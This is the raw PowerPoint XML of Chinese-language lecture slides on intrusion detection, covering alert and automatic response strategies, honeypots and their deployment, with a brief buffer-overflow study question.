              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>响应策略</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177155" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8F0448-EC5A-483F-ACFF-6C8E7CF1B9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>弹出窗口报警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>E-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通知</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>切断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行自定义程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与其他安全产品交互</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SNMP Trap</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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97ABBB52-0845-44E4-BA8F-F8A012CE7A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914400"/>
            <a:ext cx="7391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None/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178179" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C755CB-E43B-41F5-B5A4-BC5296D1699A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2209800"/>
            <a:ext cx="38100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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>压制调速 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>、 撤消连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>、 回避 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>、 隔离 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SYN/ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>RESETs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178180" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4AB5E9-59AB-4DF3-ABE7-D23311329237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="1066800"/>
            <a:ext cx="2582862"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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自动响应</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501A52BE-9728-4718-9286-509FC72F1185}"/>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B3A76BF5-A352-4B7F-BFF1-F17636EC09B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="2017713"/>
            <a:ext cx="8486775" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞利用示例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BUF_LEN = 100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>思考：如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指向的数据长度大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，会发生什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289E2540-B566-42A3-90CA-19B6E795DE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="1747838"/>
            <a:ext cx="7543800" cy="449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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>一个高级的网络节点在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>压制调速</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>技术的情况下，可以采用路由器把攻击者引导到一个经过特殊装备的系统上，这种系统被成为蜜罐</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   蜜罐是一种欺骗手段，它可以用于错误地诱导攻击者，也可以用于收集攻击信息，以改进防御能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   蜜罐能采集的信息量由自身能提供的手段以及攻击行为数量决定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179203" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67959766-60E8-4888-85A4-E94B6930662B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="1066800"/>
            <a:ext cx="2582862"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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF06F412-51E2-469E-A1C3-F2375ED3EA8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="2492375"/>
            <a:ext cx="7543800"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
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>蜜罐中填满了看起来有价值的虚假信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   合法用户不会访问这些信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   因此，任何访问蜜罐的行为都是可疑的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" b="1">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   蜜罐中装备了敏感检测器，收集攻击者的访问行为和活动信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180227" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{594FC24F-2317-4DBC-8930-23370B36E932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="1066800"/>
            <a:ext cx="2582862"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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D76965B-AA1B-4E4A-9C53-9FA546564CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="1066800"/>
            <a:ext cx="3636962"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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐部署位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181251" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617526BF-E094-432F-9BE6-F46355F70A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62125"/>
            <a:ext cx="8208963"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB85B620-8B1C-4E9B-B83C-BCD859F3BD66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1150938" y="1066800"/>
            <a:ext cx="3636962"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4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>蜜罐部署位置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{648F9483-3C48-4696-A5E9-1D7E11D8DF00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="2492375"/>
            <a:ext cx="754380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50000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF6600"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1">
